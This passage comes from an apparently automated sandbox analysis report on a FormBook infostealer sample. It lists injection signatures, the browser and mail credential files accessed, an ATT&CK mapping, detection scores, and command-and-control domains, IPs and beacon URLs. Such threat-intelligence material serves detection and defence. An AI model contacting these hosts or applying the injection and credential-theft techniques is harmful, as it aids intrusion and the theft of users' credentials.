        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CEA55 mov eax, dword ptr fs:[00000030h]8_2_044CEA55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04494257 mov eax, dword ptr fs:[00000030h]8_2_04494257
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BB260 mov eax, dword ptr fs:[00000030h]8_2_044BB260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BB260 mov eax, dword ptr fs:[00000030h]8_2_044BB260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8A62 mov eax, dword ptr fs:[00000030h]8_2_044D8A62
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444927A mov eax, dword ptr fs:[00000030h]8_2_0444927A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04418A0A mov eax, dword ptr fs:[00000030h]8_2_04418A0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov eax, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov ecx, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov eax, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov eax, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440AA16 mov eax, dword ptr fs:[00000030h]8_2_0440AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440AA16 mov eax, dword ptr fs:[00000030h]8_2_0440AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAA16 mov eax, dword ptr fs:[00000030h]8_2_044CAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAA16 mov eax, dword ptr fs:[00000030h]8_2_044CAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04423A1C mov eax, dword ptr fs:[00000030h]8_2_04423A1C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04444A2C mov eax, dword ptr fs:[00000030h]8_2_04444A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04444A2C mov eax, dword ptr fs:[00000030h]8_2_04444A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432ACB mov eax, dword ptr fs:[00000030h]8_2_04432ACB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432AE4 mov eax, dword ptr fs:[00000030h]8_2_04432AE4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443D294 mov eax, dword ptr fs:[00000030h]8_2_0443D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443D294 mov eax, dword ptr fs:[00000030h]8_2_0443D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441AAB0 mov eax, dword ptr fs:[00000030h]8_2_0441AAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441AAB0 mov eax, dword ptr fs:[00000030h]8_2_0441AAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443FAB0 mov eax, dword ptr fs:[00000030h]8_2_0443FAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440DB40 mov eax, dword ptr fs:[00000030h]8_2_0440DB40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8B58 mov eax, dword ptr fs:[00000030h]8_2_044D8B58
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440F358 mov eax, dword ptr fs:[00000030h]8_2_0440F358
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440DB60 mov ecx, dword ptr fs:[00000030h]8_2_0440DB60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04433B7A mov eax, dword ptr fs:[00000030h]8_2_04433B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04433B7A mov eax, dword ptr fs:[00000030h]8_2_04433B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C131B mov eax, dword ptr fs:[00000030h]8_2_044C131B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044853CA mov eax, dword ptr fs:[00000030h]8_2_044853CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044853CA mov eax, dword ptr fs:[00000030h]8_2_044853CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442DBE9 mov eax, dword ptr fs:[00000030h]8_2_0442DBE9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C138A mov eax, dword ptr fs:[00000030h]8_2_044C138A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BD380 mov ecx, dword ptr fs:[00000030h]8_2_044BD380
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04411B8F mov eax, dword ptr fs:[00000030h]8_2_04411B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04411B8F mov eax, dword ptr fs:[00000030h]8_2_04411B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443B390 mov eax, dword ptr fs:[00000030h]8_2_0443B390
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432397 mov eax, dword ptr fs:[00000030h]8_2_04432397
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D5BA5 mov eax, dword ptr fs:[00000030h]8_2_044D5BA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434BAD mov eax, dword ptr fs:[00000030h]8_2_04434BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434BAD mov eax, dword ptr fs:[00000030h]8_2_04434BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434BAD mov eax, dword ptr fs:[00000030h]8_2_04434BAD
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5CF33 LdrLoadDll,0_2_00E5CF33

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 63.141.242.45 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.156.58 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 87.236.16.107 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.ontheverge.wales
        Source: C:\Windows\explorer.exeDomain query: www.lastmilerent.com
        Source: C:\Windows\explorer.exeDomain query: www.moneycarrewards.com
        Source: C:\Windows\explorer.exeNetwork Connect: 199.192.28.121 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.dezella.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 185.215.4.36 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 132.148.233.235 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.utmedicined.com
        Source: C:\Windows\explorer.exeDomain query: www.gmbuxie.net
        Source: C:\Windows\explorer.exeNetwork Connect: 217.76.156.252 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.cmproutdoors.com
        Source: C:\Windows\explorer.exeNetwork Connect: 156.255.170.114 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.0w3jy.com
        Source: C:\Windows\explorer.exeDomain query: www.frogair.online
        Source: C:\Windows\explorer.exeDomain query: www.fildoor.store
        Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.222 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.parkhomenko-zinaida.ru
        Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.b-yy.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 164.88.122.250 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 154.205.192.37 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 3.127.73.216 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.staciesellslka.com
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 140000Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeThread register set: target process: 3528Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3528Jump to behavior
        Source: explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
        Source: explorer.exe, 00000003.00000000.540271211.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000003.00000000.528807169.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.830202814.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
        Source: explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Shared Modules        		Path Interception52
        Process Injection        		2
        Virtualization/Sandbox Evasion        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts52
        Process Injection        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)4
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer14
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Rundll32        		LSA Secrets1
        Remote System Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common3
        Software Packing        		Cached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 799425 Sample: zeuhAxTIRX.exe Startdate: 06/02/2023 Architecture: WINDOWS Score: 100 25 Snort IDS alert for network traffic 2->25 27 Malicious sample detected (through community Yara rule) 2->27 29 Antivirus detection for URL or domain 2->29 31 4 other signatures 2->31 7 zeuhAxTIRX.exe 2->7         started        process3 signatures4 33 Modifies the context of a thread in another process (thread injection) 7->33 35 Maps a DLL or memory area into another process 7->35 37 Sample uses process hollowing technique 7->37 39 Queues an APC in another process (thread injection) 7->39 10 explorer.exe 1 1 7->10 injected process5 dnsIp6 19 www.cmproutdoors.com 156.255.170.114, 49712, 49713, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 10->19 21 parkhomenko-zinaida.ru 185.215.4.36, 49700, 49701, 80 TVHORADADAES Denmark 10->21 23 18 other IPs or domains 10->23 41 System process connects to network (likely due to code injection or exploit) 10->41 43 Performs DNS queries to domains with low reputation 10->43 14 rundll32.exe 13 10->14         started        17 autoconv.exe 10->17         started        signatures7 process8 signatures9 45 Tries to steal Mail credentials (via file / registry access) 14->45 47 Tries to harvest and steal browser information (history, passwords, etc) 14->47 49 Modifies the context of a thread in another process (thread injection) 14->49 51 Maps a DLL or memory area into another process 14->51

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        zeuhAxTIRX.exe56%ReversingLabsWin32.Trojan.FormBook
        zeuhAxTIRX.exe54%VirustotalBrowse
        zeuhAxTIRX.exe100%AviraTR/Crypt.ZPACK.Gen
        zeuhAxTIRX.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        0.2.zeuhAxTIRX.exe.e50000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        0.0.zeuhAxTIRX.exe.e50000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        www.lastmilerent.com1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://survey-smiles.com0%URL Reputationsafe
        http://www.lastmilerent.com/dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoH100%Avira URL Cloudmalware
        https://www.staciesellslka.com/0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/uploads/fusion-scripts/cfbe0fd0551026bb9e720017defa5c86.min0%Avira URL Cloudsafe
        http://www.frogair.online/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw==100%Avira URL Cloudmalware
        http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprs-unslider-min0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/uploads/fusion-styles/c31c9462cccd628e3a0d26c81b9be7b5.min.0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_-200x71.png0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wpzillow_w3.css?0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/css/wprev-pub0%Avira URL Cloudsafe
        https://www.staciesellslka.com/homes-for-sale-search/0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_.png0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.wo0%Avira URL Cloudsafe
        https://www.staciesellslka.com0%Avira URL Cloudsafe
        https://www.staciesellslka.com/lake-anna/0%Avira URL Cloudsafe
        http://www.ontheverge.wales/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=FfOdtLZjvYP8bXm/clPh5g/7x4+RQqyIHbKOkwKrIc0A7AIax+WKqABy5xS4eERJuSBeHh7W6Lqe0kjzR+0vnl8saQ3UdmHxRw==0%Avira URL Cloudsafe
        https://www.realestatewithstacie.com/0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprev-public_tem0%Avira URL Cloudsafe
        https://www.staciesellslka.com/blog/0%Avira URL Cloudsafe
        https://www.staciesellslka.com/mortgage-calculator/0%Avira URL Cloudsafe
        https://www.staciesellslka.com/properties/0%Avira URL Cloudsafe
        http://www.staciesellslka.com/dhxt/0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/KFOmCnqEu92Fr1Mu4mxK.woff20%Avira URL Cloudsafe
        http://www.parkhomenko-zinaida.ru/dhxt/0%Avira URL Cloudsafe
        http://www.dezella.xyz/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ==100%Avira URL Cloudmalware
        http://www.fildoor.store/dhxt/100%Avira URL Cloudmalware
        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-192.jpg0%Avira URL Cloudsafe
        http://www.0w3jy.com/dhxt/?UlkAHnsI=FUiWQqlvvhcOKQQuFFk1YdMODVpPUkI9QkHdYK1vvGDvQckHnduU+ib0kpFdu5Ayi+Be8xCaUG88sYAzbmt0txmA9iBLGYJGLw==&2ani-=qhGAdkIKoH0%Avira URL Cloudsafe
        http://www.cmproutdoors.com/dhxt/100%Avira URL Cloudmalware
        http://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH100%Avira URL Cloudmalware
        https://www.netqwik.com0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/2023/02/realtor-logo.fw_.png0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff20%Avira URL Cloudsafe
        https://www.staciesellslka.com/about/0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-includes/css/classic-themes.min.css?ver=10%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/themes/Avada-Child-Theme/style.css?ver=6.1.10%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/fusion-icons/mechanic-icon-set/fonts/mechanic.ttf?0%Avira URL Cloudsafe
        http://www.ontheverge.wales/dhxt/0%Avira URL Cloudsafe
        http://www.gmbuxie.net/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g==100%Avira URL Cloudmalware
        http://www.staciesellslka.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.10%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-350.fw_.png0%Avira URL Cloudsafe
        http://www.moneycarrewards.com/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA==100%Avira URL Cloudmalware
        http://www.gmbuxie.net/dhxt/100%Avira URL Cloudmalware
        https://www.staciesellslka.com/feed/0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.10%Avira URL Cloudsafe
        https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-250.fw_.png0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider-do0%Avira URL Cloudsafe
        http://www.staciesellslka.com/dhxt/?UlkAHnsI=ifokxT4WC6kpOYMw3zM3kyJ4LmgGiGZS0703YorY1YsjQRfHkIwKIIkPfqFmPEtQEdhteK5+EAiLfL0gYcUW2DoEXWveCWJMNw==&2ani-=qhGAdkIKoH0%Avira URL Cloudsafe
        https://www.staciesellslka.com/open-home-search/0%Avira URL Cloudsafe
        http://www.frogair.online/dhxt/100%Avira URL Cloudmalware
        https://www.staciesellslka.com/wp-admin/admin-ajax.php0%Avira URL Cloudsafe
        https://www.staciesellslka.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
        http://www.lastmilerent.com/dhxt/100%Avira URL Cloudmalware
        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpg0%Avira URL Cloudsafe
        http://www.utmedicined.com/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=GMJpuu0CUPuENYia2wBq5vF0+NhzyO/+t2WdNBBbZP32/2p6mtsWQVykz4YrZzp7DrUWVvB/4Ftn1F9mFxE3fjZXBYQ8lylMnw==0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-270.jpg0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/js/wprev-publ0%Avira URL Cloudsafe
        https://www.staciesellslka.com/contact-me/0%Avira URL Cloudsafe
        http://www.dezella.xyz/dhxt/100%Avira URL Cloudmalware
        http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprev-public.js?v0%Avira URL Cloudsafe
        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-500.fw_.png0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/fusion-icons/psychology-v1.1/fonts/psychology.ttf?0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-json/0%Avira URL Cloudsafe
        https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/o-0IIpQlx3QUlC5A4PNr5TRA.woff20%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        staciesellslka.com
        		132.148.233.235
        		truetrue
          		unknown
          hk.ygrcw.cn
          		164.88.122.250
          		truetrue
            		unknown
            www.lastmilerent.com
            		217.76.156.252
            		truetrueunknown
            d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com
            		3.127.73.216
            		truefalse
              		high
              www.fildoor.store
              		87.236.16.107
              		truetrue
                		unknown
                www.moneycarrewards.com
                		199.59.243.222
                		truetrue
                  		unknown
                  frogair.online
                  		81.169.145.72
                  		truetrue
                    		unknown
                    www.dezella.xyz
                    		199.192.28.121
                    		truetrue
                      		unknown
                      www.b-yy.xyz
                      		172.67.156.58
                      		truetrue
                        		unknown
                        parkhomenko-zinaida.ru
                        		185.215.4.36
                        		truetrue
                          		unknown
                          www.utmedicined.com
                          		63.141.242.45
                          		truetrue
                            		unknown
                            www.gmbuxie.net
